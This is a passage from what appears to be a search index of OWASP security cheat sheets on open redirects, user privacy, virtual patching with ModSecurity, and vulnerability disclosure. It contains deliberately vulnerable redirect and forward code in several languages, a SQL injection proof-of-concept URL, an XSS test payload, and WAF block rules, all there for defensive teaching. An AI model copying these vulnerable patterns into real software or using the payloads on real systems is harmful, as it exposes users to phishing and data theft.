In the examples above, the URL is being explicitly declared in the code and cannot be manipulated by an attacker.

"},{"location":"cheatsheets/Unvalidated_Redirects_and_Forwards_Cheat_Sheet.html#dangerous-url-redirects","title":"Dangerous URL Redirects","text":"

The following examples demonstrate unsafe redirect and forward code.

"},{"location":"cheatsheets/Unvalidated_Redirects_and_Forwards_Cheat_Sheet.html#dangerous-url-redirect-example-1","title":"Dangerous URL Redirect Example 1","text":"

The following Java code receives the URL from the parameter named url (GET or POST) and redirects to that URL:

response.sendRedirect(request.getParameter(\"url\"));\n

The following PHP code obtains a URL from the query string (via the parameter named url) and then redirects the user to that URL. Additionally, the PHP code after this header() function will continue to execute, so if the user configures their browser to ignore the redirect, they may be able to access the rest of the page.

$redirect_url\u00a0=\u00a0$_GET['url'];\nheader(\"Location:\u00a0\"\u00a0.\u00a0$redirect_url);\n

A similar example of C# .NET Vulnerable Code:

string\u00a0url\u00a0=\u00a0request.QueryString[\"url\"];\nResponse.Redirect(url);\n

And in Rails:

redirect_to\u00a0params[:url]\n

Rust actix web

  Ok(HttpResponse::Found()\n.insert_header((header::LOCATION, query_string.path.as_str()))\n.finish())\n

The above code is vulnerable to an attack if no validation or extra method controls are applied to verify the certainty of the URL. This vulnerability could be used as part of a phishing scam by redirecting users to a malicious site.

If no validation is applied, a malicious user could create a hyperlink to redirect your users to an unvalidated malicious website, for example:

 http://example.com/example.php?url=http://malicious.example.com\n

The user sees the link directing to the original trusted site (example.com) and does not realize the redirection that could take place

"},{"location":"cheatsheets/Unvalidated_Redirects_and_Forwards_Cheat_Sheet.html#dangerous-url-redirect-example-2","title":"Dangerous URL Redirect Example 2","text":"

ASP .NET MVC 1 & 2 websites are particularly vulnerable to open redirection attacks. In order to avoid this vulnerability, you need to apply MVC 3.

The code for the LogOn action in an ASP.NET MVC 2 application is shown below. After a successful login, the controller returns a redirect to the returnUrl. You can see that no validation is being performed against the returnUrl parameter.

ASP.NET MVC 2 LogOn action in AccountController.cs (see Microsoft Docs link provided above for the context):

[HttpPost]\npublic ActionResult LogOn(LogOnModel model, string returnUrl)\n{\nif (ModelState.IsValid)\n{\nif (MembershipService.ValidateUser(model.UserName, model.Password))\n{\nFormsService.SignIn(model.UserName, model.RememberMe);\nif (!String.IsNullOrEmpty(returnUrl))\n{\nreturn Redirect(returnUrl);\n}\nelse\n{\nreturn RedirectToAction(\"Index\", \"Home\");\n}\n}\nelse\n{\nModelState.AddModelError(\"\", \"The user name or password provided is incorrect.\");\n}\n}\n\n// If we got this far, something failed, redisplay form\nreturn View(model);\n}\n
"},{"location":"cheatsheets/Unvalidated_Redirects_and_Forwards_Cheat_Sheet.html#dangerous-forward-example","title":"Dangerous Forward Example","text":"

When applications allow user input to forward requests between different parts of the site, the application must check that the user is authorized to access the URL, perform the functions it provides, and it is an appropriate URL request.

If the application fails to perform these checks, an attacker crafted URL may pass the application's access control check and then forward the attacker to an administrative function that is not normally permitted.

Example:

http://www.example.com/function.jsp?fwd=admin.jsp\n

The following code is a Java servlet that will receive a GET request with a URL parameter named fwd in the request to forward to the address specified in the URL parameter. The servlet will retrieve the URL parameter value from the request and complete the server-side forward processing before responding to the browser.

public class ForwardServlet extends HttpServlet\n{\nprotected void doGet(HttpServletRequest request, HttpServletResponse response)\nthrows ServletException, IOException {\nString query = request.getQueryString();\nif (query.contains(\"fwd\"))\n{\nString fwd = request.getParameter(\"fwd\");\ntry\n{\nrequest.getRequestDispatcher(fwd).forward(request, response);\n}\ncatch (ServletException e)\n{\ne.printStackTrace();\n}\n}\n}\n}\n
"},{"location":"cheatsheets/Unvalidated_Redirects_and_Forwards_Cheat_Sheet.html#preventing-unvalidated-redirects-and-forwards","title":"Preventing Unvalidated Redirects and Forwards","text":"

Safe use of redirects and forwards can be done in a number of ways:

"},{"location":"cheatsheets/Unvalidated_Redirects_and_Forwards_Cheat_Sheet.html#validating-urls","title":"Validating URLs","text":"

Validating and sanitising user-input to determine whether the URL is safe is not a trivial task. Detailed instructions how to implement URL validation is described in Server Side Request Forgery Prevention Cheat Sheet

"},{"location":"cheatsheets/Unvalidated_Redirects_and_Forwards_Cheat_Sheet.html#references","title":"References","text":""},{"location":"cheatsheets/User_Privacy_Protection_Cheat_Sheet.html","title":"User Privacy Protection Cheat Sheet","text":""},{"location":"cheatsheets/User_Privacy_Protection_Cheat_Sheet.html#introduction","title":"Introduction","text":"

This OWASP Cheat Sheet introduces mitigation methods that web developers may utilize in order to protect their users from a vast array of potential threats and aggressions that might try to undermine their privacy and anonymity. This cheat sheet focuses on privacy and anonymity threats that users might face by using online services, especially in contexts such as social networking and communication platforms.

"},{"location":"cheatsheets/User_Privacy_Protection_Cheat_Sheet.html#guidelines","title":"Guidelines","text":""},{"location":"cheatsheets/User_Privacy_Protection_Cheat_Sheet.html#strong-cryptography","title":"Strong Cryptography","text":"

Any online platform that handles user identities, private information or communications must be secured with the use of strong cryptography. User communications must be encrypted in transit and storage. User secrets such as passwords must also be protected using strong, collision-resistant hashing algorithms with increasing work factors, in order to greatly mitigate the risks of exposed credentials as well as proper integrity control.

To protect data in transit, developers must use and adhere to TLS/SSL best practices such as verified certificates, adequately protected private keys, usage of strong ciphers only, informative and clear warnings to users, as well as sufficient key lengths. Private data must be encrypted in storage using keys with sufficient lengths and under strict access conditions, both technical and procedural. User credentials must be hashed regardless of whether or not they are encrypted in storage.

For detailed guides about strong cryptography and best practices, read the following OWASP references:

  1. Cryptographic Storage Cheat Sheet.
  2. Authentication Cheat Sheet.
  3. Transport Layer Protection Cheat Sheet.
  4. Guide to Cryptography.
  5. Testing for TLS/SSL.
"},{"location":"cheatsheets/User_Privacy_Protection_Cheat_Sheet.html#support-http-strict-transport-security","title":"Support HTTP Strict Transport Security","text":"

HTTP Strict Transport Security (HSTS) is an HTTP header set by the server indicating to the user agent that only secure (HTTPS) connections are accepted, prompting the user agent to change all insecure HTTP links to HTTPS, and forcing the compliant user agent to fail-safe by refusing any TLS/SSL connection that is not trusted by the user.

HSTS has average support on popular user agents, such as Mozilla Firefox and Google Chrome. Nevertheless, it remains very useful for users who are in consistent fear of spying and Man in the Middle Attacks.

If it is impractical to force HSTS on all users, web developers should at least give users the choice to enable it if they wish to make use of it.

For more details regarding HSTS, please visit:

  1. HTTP Strict Transport Security in Wikipedia.
  2. IETF for HSTS RFC.
  3. OWASP Appsec Tutorial Series - Episode 4: Strict Transport Security.
"},{"location":"cheatsheets/User_Privacy_Protection_Cheat_Sheet.html#digital-certificate-pinning","title":"Digital Certificate Pinning","text":"

Certificate Pinning is the practice of hardcoding or storing a predefined set of information (usually hashes) for digital certificates/public keys in the user agent (be it web browser, mobile app or browser plugin) such that only the predefined certificates/public keys are used for secure communication, and all others will fail, even if the user trusted (implicitly or explicitly) the other certificates/public keys.

Some advantages for pinning are:

For details regarding certificate pinning, please refer to the following:

  1. OWASP Certificate Pinning Cheat Sheet.
  2. Public Key Pinning Extension for HTTP RFC.
  3. Securing the SSL channel against man-in-the-middle attacks: Future technologies - HTTP Strict Transport Security and Pinning of Certs, by Tobias Gondrom.
"},{"location":"cheatsheets/User_Privacy_Protection_Cheat_Sheet.html#panic-modes","title":"Panic Modes","text":"

A panic mode is a mode that threatened users can refer to when they fall under direct threat to disclose account credentials.

Giving users the ability to create a panic mode can help them survive these threats, especially in tumultuous regions around the world. Unfortunately many users around the world are subject to types of threats that most web developers do not know of or take into account.

Examples of panic modes are modes where distressed users can delete their data upon threat, log into fake inboxes/accounts/systems, or invoke triggers to backup/upload/hide sensitive data.

The appropriate panic mode to implement differs depending on the application type. A disk encryption software such as VeraCrypt might implement a panic mode that starts up a fake system partition if the user entered their distressed password.

Email providers might implement a panic mode that hides predefined sensitive emails or contacts, allowing reading innocent email messages only, usually as defined by the user, while preventing the panic mode from overtaking the actual account.

An important note about panic modes is that they must not be easily discoverable, if at all. An adversary inside a victim's panic mode must not have any way, or as few possibilities as possible, of finding out the truth. This means that once inside a panic mode, most non-sensitive normal operations must be allowed to continue (such as sending or receiving email), and that further panic modes must be possible to create from inside the original panic mode (If the adversary tried to create a panic mode on a victim's panic mode and failed, the adversary would know they were already inside a panic mode, and might attempt to hurt the victim).

Another solution would be to prevent panic modes from being generated from the user account, and instead making it a bit harder to spoof by adversaries. For example it could be only created Out Of Band, and adversaries must have no way to know a panic mode already exists for that particular account.

The implementation of a panic mode must always aim to confuse adversaries and prevent them from reaching the actual accounts/sensitive data of the victim, as well as prevent the discovery of any existing panic modes for a particular account.

For more details regarding VeraCrypt's hidden operating system mode, please refer to:

"},{"location":"cheatsheets/User_Privacy_Protection_Cheat_Sheet.html#remote-session-invalidation","title":"Remote Session Invalidation","text":"

In case user equipment is lost, stolen or confiscated, or under suspicion of cookie theft; it might be very beneficial for users to able to see view their current online sessions and disconnect/invalidate any suspicious lingering sessions, especially ones that belong to stolen or confiscated devices. Remote session invalidation can also helps if a user suspects that their session details were stolen in a Man-in-the-Middle attack.

For details regarding session management, please refer to:

"},{"location":"cheatsheets/User_Privacy_Protection_Cheat_Sheet.html#allow-connections-from-anonymity-networks","title":"Allow Connections from Anonymity Networks","text":"

Anonymity networks, such as the Tor Project, give users in tumultuous regions around the world a golden chance to escape surveillance, access information or break censorship barriers. More often than not, activists in troubled regions use such networks to report injustice or send uncensored information to the rest of the world, especially mediums such as social networks, media streaming websites and email providers.

Web developers and network administrators must pursue every avenue to enable users to access services from behind such networks, and any policy made against such anonymity networks need to be carefully re-evaluated with respect to impact on people around the world.

If possible, application developers should try to integrate or enable easy coupling of their applications with these anonymity networks, such as supporting SOCKS proxies or integration libraries (e.g. OnionKit for Android).

For more information about anonymity networks, and the user protections they provide, please refer to:

  1. The Tor Project.
  2. I2P Network.
  3. OnionKit: Boost Network Security and Encryption in your Android Apps.
"},{"location":"cheatsheets/User_Privacy_Protection_Cheat_Sheet.html#prevent-ip-address-leakage","title":"Prevent IP Address Leakage","text":"

Preventing leakage of user IP addresses is of great significance when user protection is in scope. Any application that hosts external third-party content, such as avatars, signatures or photo attachments; must take into account the benefits of allowing users to block third-party content from being loaded in the application page.

If it was possible to embed 3rd-party, external domain images, for example, in a user's feed or timeline; an adversary might use it to discover a victim's real IP address by hosting it on his domain and watch for HTTP requests for that image.

Many web applications need user content to operate, and this is completely acceptable as a business process; however web developers are advised to consider giving users the option of blocking external content as a precaution. This applies mainly to social networks and forums, but can also apply to web-based e-mail, where images can be embedded in HTML-formatted emails.

A similar issue exists in HTML-formatted emails that contain third-party images, however most email clients and providers block loading of third-party content by default; giving users better privacy and anonymity protection.

"},{"location":"cheatsheets/User_Privacy_Protection_Cheat_Sheet.html#honesty-transparency","title":"Honesty & Transparency","text":"

If the web application cannot provide enough legal or political protections to the user, or if the web application cannot prevent misuse or disclosure of sensitive information such as logs, the truth must be told to the users in a clear understandable form, so that users can make an educated choice about whether or not they should use that particular service.

If it doesn't violate the law, inform users if their information is being requested for removal or investigation by external entities.

Honesty goes a long way towards cultivating a culture of trust between a web application and its users, and it allows many users around the world to weigh their options carefully, preventing harm to users in various contrasting regions around the world.

More insight regarding secure logging can be found at:

"},{"location":"cheatsheets/Virtual_Patching_Cheat_Sheet.html","title":"Virtual Patching Cheat Sheet","text":""},{"location":"cheatsheets/Virtual_Patching_Cheat_Sheet.html#introduction","title":"Introduction","text":"

The goal with this cheat Sheet is to present a concise virtual patching framework that organizations can follow to maximize the timely implementation of mitigation protections.

"},{"location":"cheatsheets/Virtual_Patching_Cheat_Sheet.html#definition-virtual-patching","title":"Definition: Virtual Patching","text":"

A security policy enforcement layer which prevents and reports the exploitation attempt of a known vulnerability.

The virtual patch works when the security enforcement layer analyzes transactions and intercepts attacks in transit, so malicious traffic never reaches the web application. The resulting impact of virtual patching is that, while the actual source code of the application itself has not been modified, the exploitation attempt does not succeed.

"},{"location":"cheatsheets/Virtual_Patching_Cheat_Sheet.html#why-not-just-fix-the-code","title":"Why Not Just Fix the Code","text":"

From a purely technical perspective, the number one remediation strategy would be for an organization to correct the identified vulnerability within the source code of the web application. This concept is universally agreed upon by both web application security experts and system owners. Unfortunately, in real world business situations, there arise many scenarios where updating the source code of a web application is not easy such as:

The important point is this - Code level fixes and Virtual Patching are NOT mutually exclusive. They are processes that are executed by different team (OWASP Builders/Devs vs. OWASP Defenders/OpSec) and can be run in tandem.

"},{"location":"cheatsheets/Virtual_Patching_Cheat_Sheet.html#value-of-virtual-patching","title":"Value of Virtual Patching","text":"

The two main goals of Virtual Patching are:

"},{"location":"cheatsheets/Virtual_Patching_Cheat_Sheet.html#virtual-patching-tools","title":"Virtual Patching Tools","text":"

Notice that the definition above did not list any specific tool as there are a number of different options that may be used for virtual patching efforts such as:

For example purposes, we will show virtual patching examples using the open source ModSecurity WAF tool.

"},{"location":"cheatsheets/Virtual_Patching_Cheat_Sheet.html#a-virtual-patching-methodology","title":"A Virtual Patching Methodology","text":"

Virtual Patching, like most other security processes, is not something that should be approached haphazardly. Instead, a consistent, repeatable process should be followed that will provide the best chances of success. The following virtual patching workflow mimics the industry accepted practice for conducting IT Incident Response and consists of the following phases:

  1. Preparation.
  2. Identification.
  3. Analysis.
  4. Virtual Patch Creation.
  5. Implementation/Testing.
  6. Recovery/Follow Up.
"},{"location":"cheatsheets/Virtual_Patching_Cheat_Sheet.html#example-public-vulnerability","title":"Example Public Vulnerability","text":"

Let's take the following SQL Injection vulnerability as our example for the remainder of this article:

WordPress Shopping Cart Plugin for WordPress\n/wp-content/plugins/levelfourstorefront/scripts/administration/exportsubscribers.php\nreqID Parameter prone to SQL Injection.\n

Description:

WordPress Shopping Cart Plugin for WordPress contains a flaw that may allow an attacker to carry out an SQL injection attack.

The issue is due to the /wp-content/plugins/levelfourstorefront/scripts/administration/exportsubscribers.php script not properly sanitizing user-supplied input to the reqID parameter.

This may allow an attacker to inject or manipulate SQL queries in the back-end database, allowing for the manipulation or disclosure of arbitrary data.

"},{"location":"cheatsheets/Virtual_Patching_Cheat_Sheet.html#preparation-phase","title":"Preparation Phase","text":"

The importance of properly utilizing the preparation phase with regards to virtual patching cannot be overstated. You need to do a number of things to setup the virtual patching processes and framework prior to actually having to deal with an identified vulnerability, or worse yet, react to a live web application intrusion. The point is that during a live compromise is not the ideal time to be proposing installation of a web application firewall and the concept of a virtual patch. Tension is high during real incidents and time is of the essence, so lay the foundation of virtual patching when the waters are calm and get everything in place and ready to go when an incident does occur.

Here are a few critical items that should be addressed during the preparation phase:

"},{"location":"cheatsheets/Virtual_Patching_Cheat_Sheet.html#identification-phase","title":"Identification Phase","text":"

The Identification Phase occurs when an organization becomes aware of a vulnerability within their web application. There are generally two different methods of identifying vulnerabilities: Proactive and Reactive.

"},{"location":"cheatsheets/Virtual_Patching_Cheat_Sheet.html#proactive-identification","title":"Proactive Identification","text":"

This occurs when an organization takes it upon themselves to assess their web security posture and conducts the following tasks:

Due to the fact that custom coded web applications are unique, these proactive identification tasks are extremely important as you are not able to rely upon third-party vulnerability notifications.

"},{"location":"cheatsheets/Virtual_Patching_Cheat_Sheet.html#reactive-identification","title":"Reactive Identification","text":"

There are three main reactive methods for identifying vulnerabilities:

"},{"location":"cheatsheets/Virtual_Patching_Cheat_Sheet.html#analysis-phase","title":"Analysis Phase","text":"

Here are the recommended steps to start the analysis phase:

  1. Determine Virtual Patching Applicability - Virtual patching is ideally suited for injection-type flaws but may not provide an adequate level of attack surface reduction for other attack types or categories. Thorough analysis of the underlying flaw should be conducted to determine if the virtual patching tool has adequate detection logic capabilities.
  2. Utilize Bug Tracking/Ticketing System - Enter the vulnerability information into a bug tracking system for tracking purposes and metrics. Recommend you use ticketing systems you already use such as Jira or you may use a specialized tool such as ThreadFix.
  3. Verify the name of the vulnerability - This means that you need to have the proper public vulnerability identifier (such as CVE name/number) specified by the vulnerability announcement, vulnerability scan, etc. If the vulnerability is identified proactively rather than through public announcements, then you should assign your own unique identifier to each vulnerability.
  4. Designate the impact level - It is always important to understand the level of criticality involved with a web vulnerability. Information leakages may not be treated in the same manner as an SQL Injection issue.
  5. Specify which versions of software are impacted - You need to identify what versions of software are listed so that you can determine if the version(s) you have installed are affected.
  6. List what configuration is required to trigger the problem - Some vulnerabilities may only manifest themselves under certain configuration settings.
  7. List Proof of Concept (PoC) exploit code or payloads used during attacks/testing - Many vulnerability announcements have accompanying exploit code that shows how to demonstrate the vulnerability. If this data is available, make sure to download it for analysis. This will be useful later on when both developing and testing the virtual patch.
"},{"location":"cheatsheets/Virtual_Patching_Cheat_Sheet.html#virtual-patch-creation-phase","title":"Virtual Patch Creation Phase","text":"

The process of creating an accurate virtual patch is bound by two main tenants:

  1. No false positives - Do not ever block legitimate traffic under any circumstances.
  2. No false negatives - Do not ever miss attacks, even when the attacker intentionally tries to evade detection.

Care should be taken to attempt to minimize either of these two rules. It may not be possible to adhere 100% to each of these goals but remember that virtual patching is about Risk Reduction. It should be understood by business owners that while you are gaining the advantage of shortening the Time-to-Fix metric, you may not be implementing a complete fix for the flaw.

"},{"location":"cheatsheets/Virtual_Patching_Cheat_Sheet.html#manual-virtual-patch-creation","title":"Manual Virtual Patch Creation","text":""},{"location":"cheatsheets/Virtual_Patching_Cheat_Sheet.html#positive-security-allow-list-virtual-patches-recommended-solution","title":"Positive Security (Allow List) Virtual Patches (Recommended Solution)","text":"

Positive security model (allow list) is a comprehensive security mechanism that provides an independent input validation envelope to an application. The model specifies the characteristics of valid input (character set, length, etc\u2026) and denies anything that does not conform. By defining rules for every parameter in every page in the application the application is protected by an additional security envelop independent from its code.

"},{"location":"cheatsheets/Virtual_Patching_Cheat_Sheet.html#example-allow-list-modsecurity-virtual-patch","title":"Example Allow List ModSecurity Virtual Patch","text":"

In order to create an allow-list virtual patch, you must be able to verify what the normal, expected input values are. If you have implemented proper audit logging as part of the Preparation Phase, then you should be able to review audit logs to identify the format of expected input types. In this case, the reqID parameter is supposed to only hold integer characters so we can use this virtual patch:

##\n## Verify we only receive 1 parameter called \"reqID\"\n##\nSecRule REQUEST_URI \"@contains /wp-content/plugins/levelfourstorefront/scripts/administration/exportsubscribers.php\" \"chain,id:1,phase:2,t:none,t:Utf8toUnicode,t:urlDecodeUni,t:normalizePathWin,t:lowercase,block,msg:'Input Validation Error for \\'reqID\\' parameter - Duplicate Parameters Names Seen.',logdata:'%{matched_var}'\"\n  SecRule &ARGS:/reqID/ \"!@eq 1\"\n\n##\n## Verify reqID's payload only contains integers\n##\nSecRule REQUEST_URI \"@contains /wp-content/plugins/levelfourstorefront/scripts/administration/exportsubscribers.php\" \"chain,id:2,phase:2,t:none,t:Utf8toUnicode,t:urlDecodeUni,t:normalizePathWin,t:lowercase,block,msg:'Input Validation Error for \\'reqID\\' parameter.',logdata:'%{args.reqid}'\"\n  SecRule ARGS:/reqID/ \"!@rx ^[0-9]+$\"\n

This virtual patch will inspect the reqID parameter value on the specified page and prevent any characters other than integers as input.

"},{"location":"cheatsheets/Virtual_Patching_Cheat_Sheet.html#negative-security-block-list-virtual-patches","title":"Negative Security (Block List) Virtual Patches","text":"

A negative security model (block list) is based on a set of rules that detect specific known attacks rather than allow only valid traffic.

"},{"location":"cheatsheets/Virtual_Patching_Cheat_Sheet.html#example-block-list-modsecurity-virtual-patch","title":"Example Block List ModSecurity Virtual Patch","text":"

Here is the example PoC code that was supplied by the public advisory:

http://localhost/wordpress/wp-content/plugins/levelfourstorefront/scripts/administration/exportsubscribers.php?reqID=1' or 1='1\n

Looking at the payload, we can see that the attacker is inserting a single quote character and then adding additional SQL query logic to the end. Based on this data, we could disallow the single quote character like this:

SecRule REQUEST_URI \"@contains /wp-content/plugins/levelfourstorefront/scripts/administration/exportsubscribers.php\" \"chain,id:1,phase:2,t:none,t:Utf8toUnicode,t:urlDecodeUni,t:normalizePathWin,t:lowercase,block,msg:'Input Validation Error for \\'reqID\\' parameter.',logdata:'%{args.reqid}'\"\n  SecRule ARGS:/reqID/ \"@pm '\"\n
"},{"location":"cheatsheets/Virtual_Patching_Cheat_Sheet.html#which-method-is-better-for-virtual-patching-positive-or-negative-security","title":"Which Method is Better for Virtual Patching \u2013 Positive or Negative Security","text":"

A virtual patch may employ either a positive or negative security model. Which one you decide to use depends on the situation and a few different considerations. For example, negative security rules can usually be implemented more quickly, however the possible evasions are more likely.

Positive security rules, only the other hand, provides better protection however it is often a manual process and thus is not scalable and difficult to maintain for large/dynamic sites. While manual positive security rules for an entire site may not be feasible, a positive security model can be selectively employed when a vulnerability alert identifies a specific location with a problem.

"},{"location":"cheatsheets/Virtual_Patching_Cheat_Sheet.html#beware-of-exploit-specific-virtual-patches","title":"Beware of Exploit-Specific Virtual Patches","text":"

You want to resist the urge to take the easy road and quickly create an exploit-specific virtual patch.

For instance, if an authorized penetration test identified an XSS vulnerability on a page and used the following attack payload in the report:

<script>\nalert('XSS Test')\n</script>\n

It would not be wise to implement a virtual patch that simply blocks that exact payload. While it may provide some immediate protection, its long term value is significantly decreased.

"},{"location":"cheatsheets/Virtual_Patching_Cheat_Sheet.html#automated-virtual-patch-creation","title":"Automated Virtual Patch Creation","text":"

Manual patch creation may become unfeasible as the number of vulnerabilities grow and automated means may become necessary. If the vulnerabilities were identified using automated tools and an XML report is available, it is possible to leverage automated processes to auto-convert this vulnerability data into virtual patches for protection systems.

Three examples include:

"},{"location":"cheatsheets/Virtual_Patching_Cheat_Sheet.html#implementationtesting-phase","title":"Implementation/Testing Phase","text":"

In order to accurately test out the newly created virtual patches, it may be necessary to use an application other than a web browser. Some useful tools are:

"},{"location":"cheatsheets/Virtual_Patching_Cheat_Sheet.html#testing-steps","title":"Testing Steps","text":""},{"location":"cheatsheets/Virtual_Patching_Cheat_Sheet.html#recoveryfollow-up-phase","title":"Recovery/Follow-Up Phase","text":""},{"location":"cheatsheets/Virtual_Patching_Cheat_Sheet.html#references","title":"References","text":""},{"location":"cheatsheets/Vulnerability_Disclosure_Cheat_Sheet.html","title":"Vulnerability Disclosure Cheat Sheet","text":""},{"location":"cheatsheets/Vulnerability_Disclosure_Cheat_Sheet.html#introduction","title":"Introduction","text":"

This cheat sheet is intended to provide guidance on the vulnerability disclosure process for both security researchers and organisations. This is an area where collaboration is extremely important, but that can often result in conflict between the two parties.

Researchers should:

Organisations should:

"},{"location":"cheatsheets/Vulnerability_Disclosure_Cheat_Sheet.html#methods-of-disclosure","title":"Methods of Disclosure","text":"

There are a number of different models that can be followed when disclosing vulnerabilities, which are listed in the sections below.

"},{"location":"cheatsheets/Vulnerability_Disclosure_Cheat_Sheet.html#private-disclosure","title":"Private Disclosure","text":"

In the private disclosure model, the vulnerability is reported privately to the organisation. The organisation may choose to publish the details of the vulnerabilities, but this is done at the discretion of the organisation, not the researcher, meaning that many vulnerabilities may never be made public. The majority of bug bounty programs require that the researcher follows this model.

The main problem with this model is that if the vendor is unresponsive, or decides not to fix the vulnerability, then the details may never be made public. Historically this has lead to researchers getting fed up with companies ignoring and trying to hide vulnerabilities, leading them to the full disclosure approach.

"},{"location":"cheatsheets/Vulnerability_Disclosure_Cheat_Sheet.html#full-disclosure","title":"Full Disclosure","text":"

With the full disclosure approach, the full details of the vulnerability are made public as soon as they are identified. This means that the full details (sometimes including exploit code) are available to attackers, often before a patch is available. The full disclosure approach is primarily used in response or organisations ignoring reported vulnerabilities, in order to put pressure on them to develop and publish a fix.

This makes the full disclosure approach very controversial, and it is seen as irresponsible by many people. Generally it should only be considered as a last resort, when all other methods have failed, or when exploit code is already publicly available.

"},{"location":"cheatsheets/Vulnerability_Disclosure_Cheat_Sheet.html#responsible-or-coordinated-disclosure","title":"Responsible or Coordinated Disclosure","text":"

Responsible disclosure attempts to find a reasonable middle ground between these two approaches. With responsible disclosure, the initial report is made privately, but with the full details being published once a patch has been made available (sometimes with a delay to allow more time for the patches to be installed).

In many cases, the researcher also provides a deadline for the organisation to respond to the report, or to provide a patch. If this deadline is not met, then the researcher may adopt the full disclosure approach, and publish the full details.

Google's Project Zero adopts a similar approach, where the full details of the vulnerability are published after 90 days regardless of whether or not the organisation has published a patch.

"},{"location":"cheatsheets/Vulnerability_Disclosure_Cheat_Sheet.html#reporting-vulnerabilities","title":"Reporting Vulnerabilities","text":"

This section is intended to provide guidance for security researchers on how to report vulnerabilities to organisations.

"},{"location":"cheatsheets/Vulnerability_Disclosure_Cheat_Sheet.html#warnings-and-legality","title":"Warnings and Legality","text":"

Before carrying out any security research or reporting vulnerabilities, ensure that you know and understand the laws in your jurisdiction. This cheat sheet does not constitute legal advice, and should not be taken as such..

The following points highlight a number of areas that should be considered:

"},{"location":"cheatsheets/Vulnerability_Disclosure_Cheat_Sheet.html#finding-contact-details","title":"Finding Contact Details","text":"

The first step in reporting a vulnerability is finding the appropriate person to report it to. Although some organisations have clearly published disclosure policies, many do not, so it can be difficult to find the correct place to report the issue.

Where there is no clear disclosure policy, the following areas may provide contact details:

When reaching out to people who are not dedicated security contacts, request the details for a relevant member of staff, rather than disclosing the vulnerability details to whoever accepts the initial contact (especially over social media).

If it is not possible to contact the organisation directly, a national or sector-based CERT may be able to assist.

"},{"location":"cheatsheets/Vulnerability_Disclosure_Cheat_Sheet.html#initial-report","title":"Initial Report","text":"

Once a security contact has been identified, an initial report should be made of the details of the vulnerability. Ideally this should be done over an encrypted channel (such as the use of PGP keys), although many organisations do not support this.

The initial report should include:

In many cases, especially in smaller organisations, the security reports may be handled by developers or IT staff who do not have a security background. This means that they may not be familiar with many security concepts or terminology, so reports should be written in clear and simple terms.

It may also be beneficial to provide a recommendation on how the issue could be mitigated or resolved. However, unless the details of the system or application are known, or you are very confident in the recommendation then it may be better to point the developers to some more general guidance (such as an OWASP cheat sheet).

If you are planning to publish the details of the vulnerability after a period of time (as per some responsible disclosure policies), then this should be clearly communicated in the initial email - but try to do so in a tone that doesn't sound threatening to the recipient.

If the organisation does not have an established bug bounty program, then avoid asking about payments or rewards in the initial contact - leave it until the issue has been acknowledged (or ideally fixed). In particular, do not demand payment before revealing the details of the vulnerability. At best this will look like an attempt to scam the company, at worst it may constitute blackmail.

"},{"location":"cheatsheets/Vulnerability_Disclosure_Cheat_Sheet.html#ongoing-communication","title":"Ongoing Communication","text":"

While simpler vulnerabilities might be resolved solely from the initial report, in many cases there will be a number of emails back and forth between the researcher and the organisation. Especially for more complex vulnerabilities, the developers or administrators may ask for additional information or recommendations on how to resolve the issue. They may also ask for assistance in retesting the issue once a fix has been implemented. Although there is no obligation to carry out this retesting, as long as the request is reasonable then and providing feedback on the fixes is very beneficial.

It may also be necessary to chase up the organisation if they become unresponsive, or if the established deadline for publicly disclosing the vulnerability is approaching. Ensure that this communication stays professional and positive - if the disclosure process becomes hostile then neither party will benefit.

Be patient if it's taking a while for the issue to be resolved. The developers may be under significant pressure from different people within the organisation, and may not be able to be fully open in their communication. Triaging, developing, reviewing, testing and deploying a fix within in an enterprise environment takes significantly more time than most researchers expect, and being constantly hassled for updates just adds another level of pressure on the developers.

"},{"location":"cheatsheets/Vulnerability_Disclosure_Cheat_Sheet.html#when-to-give-up","title":"When to Give Up","text":"

Despite every effort that you make, some organisations are not interested in security, are impossible to contact, or may be actively hostile to researchers disclosing vulnerabilities. In some cases they may even threaten to take legal action against researchers. When this happens it is very disheartening for the researcher - it is important not to take this personally. When this happens, there are a number of options that can be taken.

There are many organisations who have a genuine interest in security, and are very open and co-operative with security researchers. Unless the vulnerability is extremely serious, it is not worth burning yourself out, or risking your career and livelihood over an organisation who doesn't care.

"},{"location":"cheatsheets/Vulnerability_Disclosure_Cheat_Sheet.html#publishing","title":"Publishing","text":"

Once a vulnerability has been patched (or not), then a decision needs to be made about publishing the details. This should ideally be done through discussion with the vendor, and at a minimum the vendor should be notified that you intend to publish, and provided with a link to the published details. The disclosure would typically include:

Some organisations may request that you do not publish the details at all, or that you delay publication to allow more time to their users to install security patches. In the interest of maintaining a positive relationship with the organisation, it is worth trying to find a compromise position on this.

Whether to publish working proof of concept (or functional exploit code) is a subject of debate. Some people will view this as a \"blackhat\" move, and will argue that by doing so you are directly helping criminals compromise their users. On the other hand, the code can be used to both system administrators and penetration testers to test their systems, and attackers will be able to develop or reverse engineering working exploit code if the vulnerability is sufficiently valuable.

If you are publishing the details in hostile circumstances (such as an unresponsive organisation, or after a stated period of time has elapsed) then you may face threats and even legal action. Whether there is any legal basis for this will depend on your jurisdiction, and whether you signed any form of non-disclosure agreement with the organisation. Make sure you understand your legal position before doing so.

Note that many bug bounty programs forbid researchers from publishing the details without the agreement of the organisation. If you choose to do so, you may forfeit the bounty or be banned from the platform - so read the rules of the program before publishing.

"},{"location":"cheatsheets/Vulnerability_Disclosure_Cheat_Sheet.html#receiving-vulnerability-reports","title":"Receiving Vulnerability Reports","text":"

This section is intended to provide guidance for organisations on how to accept and receive vulnerability reports.

"},{"location":"cheatsheets/Vulnerability_Disclosure_Cheat_Sheet.html#bug-bounty-programs","title":"Bug Bounty Programs","text":"

Bug bounty programs incentivise researchers to identify and report vulnerabilities to organisations by offering rewards. These are usually monetary, but can also be physical items (swag). The process is often managed through a third party such as BugCrowd or HackerOne, who provide mediation between researchers and organisations.

When implementing a bug bounty program, the following areas need to be clearly defined:

"},{"location":"cheatsheets/Vulnerability_Disclosure_Cheat_Sheet.html#when-to-implement-a-bug-bounty-program","title":"When to Implement a Bug Bounty Program","text":"

Bug bounty have been adopted by many large organisations such as Microsoft, and are starting to be used outside of the commercial sector, including the US Department of Defense. However, for smaller organisations they can bring significant challenges, and require a substantial investment of time and resources. These challenges can include:

Despite these potential issues, bug bounty programs are a great way to identify vulnerabilities in applications and systems. However, they should only be used by organisations that already have a mature vulnerability disclosure process, supported by strong internal processes to resolve vulnerabilities.

"},{"location":"cheatsheets/Vulnerability_Disclosure_Cheat_Sheet.html#publishing-contact-details","title":"Publishing Contact Details","text":"

